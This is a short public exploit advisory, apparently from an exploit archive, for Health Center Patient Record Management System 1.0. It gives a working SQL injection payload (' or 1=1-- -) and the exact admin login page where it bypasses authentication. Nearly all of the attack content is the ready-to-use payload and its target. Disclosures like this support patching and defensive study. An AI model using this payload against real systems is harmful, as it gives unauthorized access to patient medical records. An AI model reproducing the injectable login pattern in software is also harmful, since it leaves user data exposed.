Health Center Patient Record Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
30b359ed7718814adfd99b7294bc09d230b66af0bfb6c2ecd479163ed7f99024
# Exploit Title: Health Center Patient Record Management System | Admin Login Bypass (SQLi)
# Exploit Author: Richard Jones
# Date: 2021-03-29
# Vendor Homepage: https://www.sourcecodester.com/php/11058/health-center-patient-record-management-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=11058&title=Health+Center+Patient+Record+Management+System+using+PHP+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34
# Payload: ' or 1=1-- -
# Enter payload for login details here: https://TARGET/hcpms/admin/index.php